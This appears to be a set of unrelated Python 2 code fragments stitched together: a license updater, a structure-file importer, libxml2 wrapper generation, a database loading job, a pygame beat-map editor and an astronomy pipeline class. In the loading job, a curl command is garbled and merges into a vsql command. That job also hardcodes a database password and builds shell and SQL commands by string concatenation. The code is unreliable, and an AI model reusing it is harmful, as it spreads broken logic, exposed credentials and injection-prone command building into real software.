** ensure the GNU Lesser General Public License version 3 requirements ** will be met: http://www.gnu.org/licenses/lgpl-3.0.html.""") if (len(sys.argv) == 1): thisDirectory = os.getcwd() else: thisDirectory = sys.argv[1] LIGER_ROOT = os.path.join(thisDirectory, "../../") print(LIGER_ROOT) for root, dirs, files in os.walk(LIGER_ROOT): for fileName in files: if (fileName != "update_lic.py"): filePath = os.path.join(root, fileName) curText = open(filePath, 'r').read() for prevYearNum in range(startYearNum, curYearNum): if string.find( curText, oldLicTemplate.substitute( startYear=str(startYearNum), prevYear=str(prevYearNum))) != -1: newFileText = string.replace( curText, oldLicTemplate.substitute(startYear=str(startYearNum), prevYear=str(prevYearNum)), newLicTemplate.substitute(startYear=str(startYearNum), curYear=str(curYearNum))) fileWriter = open(filePath, 'w') fileWriter.write(newFileText) break
### 1. User set CSY File PATH csyFilePath = "./temp/xxx.csy1" flog = open("./result/EditWindow.dat", "wt") enginekey = 'Abred' print ' ===== start Abinit_import ======' fr = open(csyFilePath, "rt") wtext = fr.read() result = "" site = [] type = [] wtext = string.split(wtext, "\n") sss = '' for iline in wtext: if (string.find(iline, '#') == 0): continue sss = sss + iline + '\n' sss = string.split(sss) print sss ixx = 0 # for cell part result = result + "\n" result = result + set_cell_information(sss) result = result + "CV1=PV1 \n" result = result + "CV2=PV2 \n" result = result + "CV3=PV3 \n" result = result + set_site_line(sss) result = result + set_type_line(sss) # we get type information
def buildWrappers(): global ctypes global py_types global py_return_types global unknown_types global functions global function_classes global classes_type global classes_list global converter_type global primary_classes global converter_type global classes_ancestor global converter_type global primary_classes global classes_ancestor global classes_destructors global functions_noexcept for type in classes_type.keys(): function_classes[classes_type[type][2]] = [] # # Build the list of C types to look for ordered to start # with primary classes # ctypes = [] classes_list = [] ctypes_processed = {} classes_processed = {} for classe in primary_classes: classes_list.append(classe) classes_processed[classe] = () for type in classes_type.keys(): tinfo = classes_type[type] if tinfo[2] == classe: ctypes.append(type) ctypes_processed[type] = () for type in classes_type.keys(): if ctypes_processed.has_key(type): continue tinfo = classes_type[type] if not classes_processed.has_key(tinfo[2]): classes_list.append(tinfo[2]) classes_processed[tinfo[2]] = () ctypes.append(type) ctypes_processed[type] = () for name in functions.keys(): found = 0 (desc, ret, args, file, cond) = functions[name] for type in ctypes: classe = classes_type[type][2] if name[0:3] == "xml" and len(args) >= 1 and args[0][1] == type: found = 1 func = nameFixup(name, classe, type, file) info = (0, func, name, ret, args, file) function_classes[classe].append(info) elif name[0:3] == "xml" and len(args) >= 2 and args[1][1] == type \ and file != "python_accessor": found = 1 func = nameFixup(name, classe, type, file) info = (1, func, name, ret, args, file) function_classes[classe].append(info) elif name[0:4] == "html" and len(args) >= 1 and args[0][1] == type: found = 1 func = nameFixup(name, classe, type, file) info = (0, func, name, ret, args, file) function_classes[classe].append(info) elif name[0:4] == "html" and len(args) >= 2 and args[1][1] == type \ and file != "python_accessor": found = 1 func = nameFixup(name, classe, type, file) info = (1, func, name, ret, args, file) function_classes[classe].append(info) if found == 1: continue if name[0:8] == "xmlXPath": continue if name[0:6] == "xmlStr": continue if name[0:10] == "xmlCharStr": continue func = nameFixup(name, "None", file, file) info = (0, func, name, ret, args, file) function_classes['None'].append(info) classes = open("libxml2class.py", "w") txt = open("libxml2class.txt", "w") txt.write(" Generated Classes for libxml2-python\n\n") txt.write("#\n# Global functions of the module\n#\n\n") if function_classes.has_key("None"): flist = function_classes["None"] flist.sort(functionCompare) oldfile = "" for info in flist: (index, func, name, ret, args, file) = info if file != oldfile: classes.write("#\n# Functions from module %s\n#\n\n" % file) txt.write("\n# functions from module %s\n" % file) oldfile = file classes.write("def %s(" % func) txt.write("%s()\n" % func) n = 0 for arg in args: if n != 0: classes.write(", ") classes.write("%s" % arg[0]) n = n + 1 classes.write("):\n") writeDoc(name, args, ' ', classes) for arg in args: if classes_type.has_key(arg[1]): classes.write(" if %s is None: %s__o = None\n" % (arg[0], arg[0])) classes.write(" else: %s__o = %s%s\n" % (arg[0], arg[0], classes_type[arg[1]][0])) if ret[0] != "void": classes.write(" ret = ") else: classes.write(" ") classes.write("libxml2mod.%s(" % name) n = 0 for arg in args: if n != 0: classes.write(", ") classes.write("%s" % arg[0]) if classes_type.has_key(arg[1]): classes.write("__o") n = n + 1 classes.write(")\n") if ret[0] != "void": if classes_type.has_key(ret[0]): # # Raise an exception # if functions_noexcept.has_key(name): classes.write(" if ret is None:return None\n") elif string.find(name, "URI") >= 0: classes.write( " if ret is None:raise uriError('%s() failed')\n" % (name)) elif string.find(name, "XPath") >= 0: classes.write( " if ret is None:raise xpathError('%s() failed')\n" % (name)) elif string.find(name, "Parse") >= 0: classes.write( " if ret is None:raise parserError('%s() failed')\n" % (name)) else: classes.write( " if ret is None:raise treeError('%s() failed')\n" % (name)) classes.write(" return ") classes.write(classes_type[ret[0]][1] % ("ret")) classes.write("\n") else: classes.write(" return ret\n") classes.write("\n") txt.write("\n\n#\n# Set of classes of the module\n#\n\n") for classname in classes_list: if classname == "None": pass else: if classes_ancestor.has_key(classname): txt.write("\n\nClass %s(%s)\n" % (classname, classes_ancestor[classname])) classes.write("class %s(%s):\n" % (classname, classes_ancestor[classname])) classes.write(" def __init__(self, _obj=None):\n") if classes_ancestor[classname] == "xmlCore" or \ classes_ancestor[classname] == "xmlNode": classes.write(" if type(_obj).__name__ != ") classes.write("'PyCObject':\n") classes.write(" raise TypeError, ") classes.write("'%s needs a PyCObject argument'\n" % \ classname) if reference_keepers.has_key(classname): rlist = reference_keepers[classname] for ref in rlist: classes.write(" self.%s = None\n" % ref[1]) classes.write(" self._o = _obj\n") classes.write(" %s.__init__(self, _obj=_obj)\n\n" % (classes_ancestor[classname])) if classes_ancestor[classname] == "xmlCore" or \ classes_ancestor[classname] == "xmlNode": classes.write(" def __repr__(self):\n") format = "<%s (%%s) object at 0x%%x>" % (classname) classes.write( " return \"%s\" %% (self.name, long(pos_id (self)))\n\n" % (format)) else: txt.write("Class %s()\n" % (classname)) classes.write("class %s:\n" % (classname)) classes.write(" def __init__(self, _obj=None):\n") if reference_keepers.has_key(classname): list = reference_keepers[classname] for ref in list: classes.write(" self.%s = None\n" % ref[1]) classes.write( " if _obj != None:self._o = _obj;return\n") classes.write(" self._o = None\n\n") destruct = None if classes_destructors.has_key(classname): classes.write(" def __del__(self):\n") classes.write(" if self._o != None:\n") classes.write(" libxml2mod.%s(self._o)\n" % classes_destructors[classname]) classes.write(" self._o = None\n\n") destruct = classes_destructors[classname] flist = function_classes[classname] flist.sort(functionCompare) oldfile = "" for info in flist: (index, func, name, ret, args, file) = info # # Do not provide as method the destructors for the class # to avoid double free # if name == destruct: continue if file != oldfile: if file == "python_accessor": classes.write(" # accessors for %s\n" % (classname)) txt.write(" # accessors\n") else: classes.write(" #\n") classes.write(" # %s functions from module %s\n" % (classname, file)) txt.write("\n # functions from module %s\n" % file) classes.write(" #\n\n") oldfile = file classes.write(" def %s(self" % func) txt.write(" %s()\n" % func) n = 0 for arg in args: if n != index: classes.write(", %s" % arg[0]) n = n + 1 classes.write("):\n") writeDoc(name, args, ' ', classes) n = 0 for arg in args: if classes_type.has_key(arg[1]): if n != index: classes.write( " if %s is None: %s__o = None\n" % (arg[0], arg[0])) classes.write( " else: %s__o = %s%s\n" % (arg[0], arg[0], classes_type[arg[1]][0])) n = n + 1 if ret[0] != "void": classes.write(" ret = ") else: classes.write(" ") classes.write("libxml2mod.%s(" % name) n = 0 for arg in args: if n != 0: classes.write(", ") if n != index: classes.write("%s" % arg[0]) if classes_type.has_key(arg[1]): classes.write("__o") else: classes.write("self") if classes_type.has_key(arg[1]): classes.write(classes_type[arg[1]][0]) n = n + 1 classes.write(")\n") if ret[0] != "void": if classes_type.has_key(ret[0]): # # Raise an exception # if functions_noexcept.has_key(name): classes.write( " if ret is None:return None\n") elif string.find(name, "URI") >= 0: classes.write( " if ret is None:raise uriError('%s() failed')\n" % (name)) elif string.find(name, "XPath") >= 0: classes.write( " if ret is None:raise xpathError('%s() failed')\n" % (name)) elif string.find(name, "Parse") >= 0: classes.write( " if ret is None:raise parserError('%s() failed')\n" % (name)) else: classes.write( " if ret is None:raise treeError('%s() failed')\n" % (name)) # # generate the returned class wrapper for the object # classes.write(" __tmp = ") classes.write(classes_type[ret[0]][1] % ("ret")) classes.write("\n") # # Sometime one need to keep references of the source # class in the returned class object. # See reference_keepers for the list # tclass = classes_type[ret[0]][2] if reference_keepers.has_key(tclass): list = reference_keepers[tclass] for pref in list: if pref[0] == classname: classes.write(" __tmp.%s = self\n" % pref[1]) # # return the class # classes.write(" return __tmp\n") elif converter_type.has_key(ret[0]): # # Raise an exception # if functions_noexcept.has_key(name): classes.write(" if ret is None:return None") elif string.find(name, "URI") >= 0: classes.write( " if ret is None:raise uriError('%s() failed')\n" % (name)) elif string.find(name, "XPath") >= 0: classes.write( " if ret is None:raise xpathError('%s() failed')\n" % (name)) elif string.find(name, "Parse") >= 0: classes.write( " if ret is None:raise parserError('%s() failed')\n" % (name)) else: classes.write( " if ret is None:raise treeError('%s() failed')\n" % (name)) classes.write(" return ") classes.write(converter_type[ret[0]] % ("ret")) classes.write("\n") else: classes.write(" return ret\n") classes.write("\n") # # Generate enum constants # for type, enum in enums.items(): classes.write("# %s\n" % type) items = enum.items() items.sort(lambda i1, i2: cmp(long(i1[1]), long(i2[1]))) for name, value in items: classes.write("%s = %s\n" % (name, value)) classes.write("\n") txt.close() classes.close()
def processdate(datatype, yymm): hwlog = open('/root/proc/log/' + datatype + '_processing_' + yymm + '.log', 'w') hwlog.write("#####################################################\n") hwlog.write(" Starting " + datatype + '_' + yymm + "\n") hwlog.write("#####################################################\n") hwlog.write("Creating HDFS directory for " + datatype + " (" + yymm + ") ........\n") sqlstmt = 'select INSERVSERIAL, to_char(DATADATE,\'MM/DD/YYYY\'), YYMMDD, FILENAMEPATH, STATS_OUTPUTFILE_NAME, STATS_OUTPUTFILE_ID from vw_' + datatype + '_current where yymmdd=\'' + yymm + '\' order by inservserial' constr = 'ods/[email protected]:1521/callhomeods' oraconn = oracon.openconnect(constr) hwlog.write("Collecting files from DB") resultrec = oracon.execSql(oraconn, sqlstmt) dbloadfl = open('/root/proc/sql/' + datatype + '_' + yymm + '.sql', 'w') vertflsql = '/root/proc/sql/' + datatype + '_' + yymm + '.sql' ctr = 0 fctr = 0 totfiles = 0 maxthread = 50 for rec in resultrec: inserv = rec[0] datadate = rec[1] yymmdd = rec[2] filenamepath = rec[3] filename = rec[4] fileid = rec[5] try: datfl = open(filenamepath) currdir = '/root/proc/data/' outfl = open(currdir + filename, 'w') data = datfl.readlines() newdat = [] hwlog.write("Processing file :" + filenamepath + "\n") hwlog.flush() for dt in data: orgdt = string.replace(dt, '\n', '') orgdt = string.replace(orgdt, '\r', '') newdt = str(inserv) + '\t' + str( datadate) + '\t' + orgdt + '\t' + str(fileid) newdt = string.replace(newdt, '\t', '|') newdat.append(newdt) outfl.write(string.join(newdat, '\n')) outfl.close() checkcreatehdfsfolder(datatype, str(yymmdd), inserv) flstatus = commands.getoutput( 'curl -v -X GET "http://*****:*****@llhome -h callhomelab-vertica01 callhomedb & > /root/proc/log/' + datatype + '_' + yymm + '.sql.log') dbloadfl = open( '/root/proc/sql/' + datatype + '_' + yymm + '.sql', 'w') vertflsql = '/root/proc/sql/' + datatype + '_' + yymm + '.sql' numjobs = int(commands.getoutput('ps -ef | grep curl | wc -l')) while (numjobs - 1) > maxthread: time.sleep(30) numjobs = int( commands.getoutput('ps -ef | grep curl | wc -l')) maxthread = maxthread - (numjobs - 1) if maxthread < 0: maxthread = 50 crt = 0 ctr += 1 totfiles += 1 except: hwlog.write("Error : " + str(sys.exc_info()[1]) + "\n") break hwlog.write('Files for ' + yymm + ': are ' + str(totfiles) + '\n') totfiles = 0 hwlog.flush() dbloadfl.close() time.sleep(60) hwlog.write('Executing Vertica Script for ' + vertflsql + '\n') os.system( '/opt/vertica/bin/vsql -f ' + vertflsql + ' -U dbadmin -w c@llhome -h callhomelab-vertica01 callhomedb & > /root/proc/log/' + datatype + '_' + yymm + '.sql.log') os.system('rm -rf data/*.' + str(yymm) + '.*') resultrec.close() hwlog.write("Done processing " + yymm) hwlog.close() oraconn.close()
def Contains(s,sub): return string.find(s, sub) != -1
def _string(buffer): return buffer[:string.find(buffer, '\0')]
def events(self): #Because the gameplay requires constant stream of keypress #information, continuously send anyway. self.playingUpdate() #for all other events for event in pygame.event.get(): #print event #quit when x button is pressed if event.type == pygame.QUIT: self.isRunning = False #check that the event has attr of key to prevent crashes if hasattr(event, 'key'): keys = pygame.key.get_pressed() if self.status["mapping"]: if keys[self.leftKey] and keys[self.shiftKey]: if self.currentBeat != "1:1:1": self.currentBeat = self.backwardSubBeat() self.loadMap() elif keys[self.leftKey]: if self.currentBeat != "1:1:1": for i in xrange(4): self.currentBeat = self.backwardSubBeat() self.loadMap() if keys[self.rightKey] and keys[self.shiftKey]: self.currentBeat = self.forwardSubBeat() self.loadMap() elif keys[self.rightKey]: for i in xrange(4): self.currentBeat = self.forwardSubBeat() self.loadMap() if keys[self.pKey]: if self.status["mapping"]: self.timerStart = time.time() self.timerDelay = convertTime(self.currentBeat, self.tempo) self.playMusic(self.music, self.timerDelay) if self.status["playback"]: self.timer = 0 pygame.mixer.music.stop() self.status["mapping"] = not self.status["mapping"] self.status["playback"] = not self.status["playback"] if keys[self.eKey]: fout = open("parsed.txt","wt") beats = list() with open("beatmap.txt","rt") as fin: content = fin.read().split("\n") content.sort() times = list() print content for i in xrange(len(content)): if i <= 1 or i == len(content)-1: continue line = content[i] beats.append(line) end = string.find(line, "\"", 3) timeCurrent = line[2:end] currentTime = convertTime(timeCurrent,self.tempo) times.append(currentTime) times.sort() diffs = list() print times for i in xrange(len(times)): timer = times[i] diff = 0 for j in xrange(2,len(times)): temp = times[i-j] if times != temp: diff = timer-temp break diffs.append(diff) lastMeasure = 0 for beat in beats: end = string.find(beat, ":",2) temp = beat[2:end] if temp != "": lastMeasure = int(temp) if int(temp)>int(lastMeasure) else lastMeasure print lastMeasure self.currentBeat = "1:1:1" pauseCount = 2 for i in xrange(lastMeasure*16): print self.currentBeat if self.currentBeat in self.notes: times = self.notes[self.currentBeat] print times for pos in times: fout.write("overload.makeBlook("+str(pos[0])+","+str(pos[1])+");\n") fout.write("yield return new WaitForSeconds("+str(diffs[pauseCount])+"f);\n") pauseCount+=1 self.currentBeat = self.forwardSubBeat() fout.close() #"yield return new WaitForSeconds(0.0f);" #makeBlock(x, y); if event.type == pygame.MOUSEBUTTONDOWN: (x,y)=pygame.mouse.get_pos() row,col = -1,-1 if (x>=20 and x<=620 and y>=20 and y<=420): x-=20; y-=20; row = y/100 col = x/100 if self.currentBeatGrid[row][col] == 0: print "WRITING", row,col self.currentBeatGrid[row][col] = 1 self.notes[self.currentBeat] = (col,row) self.writeMap(self.currentBeat,(col,row)) else: print "REMOVING" self.currentBeatGrid[row][col] = 0 vals = self.notes[self.currentBeat] vals.pop(vals.index((col,row))) self.notes[self.currentBeat] = vals self.removeMap(self.currentBeat,(col,row))
class DataSet: """ the class defines a new observation directory structure. The constructor builds the paths for the new observation (newobs). This tells anything receiving one of these objects where all the data is. The buildObs method creates the directory structure. """ def __init__(self, newobs, ownIraf=0): self.modName = string.split(string.split(str(self))[0], '.')[0][1:] # this is the module name self.newobs = newobs # new observation's name self.base = path.Env() self.configdir = self.base.getenv('CONFIGS') self.pardir = self.base.getenv('PARS') self.ingestdir = os.path.join(self.base.getenv('INGEST'), newobs) # where it is in the INGEST dir self.newobspath = os.path.join( self.base.getenv('DATASETS'), newobs) # new observation's path under $PIPELINE/DATASETS self.newpardir = os.path.join(self.newobspath, 'par') # parfile dir self.fitsdir = os.path.join(self.newobspath, 'Images') # the dir where all data is sent self.catdir = os.path.join(self.newobspath, 'Catalogs') self.prodir = os.path.join(self.newobspath, 'Output') #WZ self.reddir = os.path.join(self.newobspath, 'Red') #WZ self.aligndir = os.path.join(self.newobspath, 'align') self.messagedir = os.path.join(self.newobspath, 'Messages') self.root = self.newobspath self.ownIraf = ownIraf self.errorList = [] self.inputList = [] self.outputList = {} # outputList is now a dictionary to accomodate # predecessor images. # this instance variable is initialised here # and again in the buildObs method or not depending on the # value of the method call counter. self.fitslist must be # reset if buildObs() is called multiple times though if that # is being done, the caller is doing something extraordinary. self.fitslist = [] # this counter will track the number of calls of the buildObs method. self.buildObsCallCounter = 0 def getObsPath(self): """ return the path of the DataSet's root directory. """ return self.newobspath def getFitsPath(self): """ return the path of the DataSet's Images directory. """ return self.fitsdir def getCatPath(self): """ return the path of the DataSet's Catalogs directory. """ return self.catdir def getProdPath(self): """ return the path of the DataSet's products directory. """ return self.prodir #WZ def getProdPath(self): """ return the path of the DataSet's products directory. """ return self.reddir #WZ def getParPath(self): """ return the path of the DataSet's par directory. """ return self.newpardir def buildObs(self): """ set up the new observation directory structure. Copy the fits data from the Ingest area to the new observations dir under DATASETS. Copied files are determined from the asnDict dictionary. Also, this method sets up an IRAF environment for the pipeline, removing dependency on the user's environment, hopefully. """ datasets_dir = self.base.getenv('DATASETS') if not os.path.isdir(datasets_dir): print 'Cannot find the $DATASETS directory....WFP will try to create it.' try: os.makedirs(datasets_dir) print 'Created $DATASETS directory %s' % datasets_dir except OSError, error: print error sys.exit() if not os.path.isdir(self.newobspath): os.mkdir(self.newobspath) os.mkdir(self.fitsdir) self.logfile = logFile(self.newobspath) # Initiate the logfile self.asnDict = fUtil.makeAsnDict(self.ingestdir) # buildObsCallCounter tracks the number of times this method is called. # Previously every call of this method would reset the fitslist attr. # An effort to allow users to use their own fitslists of images # for wfp processing of non-wfp filter images. However, fitslist # will still get zeroed if this method is called more than once. self.buildObsCallCounter += 1 if self.buildObsCallCounter == 1: pass else: self.fitslist = [] for key in self.asnDict.keys(): self.fitslist.append(key) for file in self.asnDict[key]: self.fitslist.append(file) for i in self.fitslist: try: copyfile(os.path.join(self.ingestdir, i), os.path.join(self.fitsdir, i)) except IOError, err: self.logfile.write( "An IOError has occurred in the copyfile call") self.logfile.write("IOError:" + str(err)) raise IOError, err self.inputList = self.fitslist # inputList is for the mkMsg() method. self.logfile.write( 'Ingest Data moved to observation FITS dir complete.') os.mkdir(self.newpardir) os.mkdir(self.catdir) os.mkdir(self.prodir) #WZ os.mkdir(self.reddir) #WZ os.mkdir(self.aligndir) # get any default.* optional input files self.defaultlist = glob.glob(self.ingestdir + '/default*') for deffile in self.defaultlist: copy(deffile, self.fitsdir) # read the $PIPELINE/configs/login.cl file, adjust the home and userid settings # and write it to the images dir and make a uparm dir. See Bugzilla bug # 2077 # as to why this is being done. if not self.ownIraf: irafLoginLines = open(os.path.join(self.configdir, "login.cl")).readlines() newLoginFile = open(os.path.join(self.fitsdir, "login.cl"), "w") for line in irafLoginLines: if string.find(line, "set\thome\t\t=") != -1: newLoginFile.write("set\thome\t\t= \"" + self.fitsdir + "/\"\n") elif string.find(line, "set\tuserid\t\t=") != -1: newLoginFile.write("set\tuserid\t\t= \"" + os.environ["USER"] + "\"\n") else: newLoginFile.write(line) newLoginFile.close() os.mkdir(os.path.join(self.fitsdir, "uparm")) # set the env var MY_IRAF_HOME to be the images dir of the dataset os.environ["MY_IRAF_HOME"] = self.fitsdir # #pdb.set_trace() self._setIraf() if os.path.isfile(os.path.join(self.fitsdir, "default.shifts")): os.rename(os.path.join(self.fitsdir, "default.shifts"), os.path.join(self.aligndir, "default.shifts")) self.logfile.write( "Warning: buildObs method found a default.shifts file. Moved to align." ) os.mkdir(self.messagedir) self.logfile.write('Directory build complete.') # AKS - Include convert cts/s -> cts script here self.logfile.write('Converting counts/sec to counts.') for asn in self.asnDict.keys(): for file in self.asnDict[asn]: convertCts.convert_fits(self, os.path.join(self.fitsdir, file)) #for i in self.fitslist: # # Skip the association file marked by '_asn.fits' # if not re.search('_asn', i, re.IGNORECASE): # convertCts.convert_fits(self, os.path.join(self.fitsdir, i)) #pdb.set_trace() self._rotateHdr() #AKS
def _line(buffer): return buffer[:string.find(buffer, '\n')]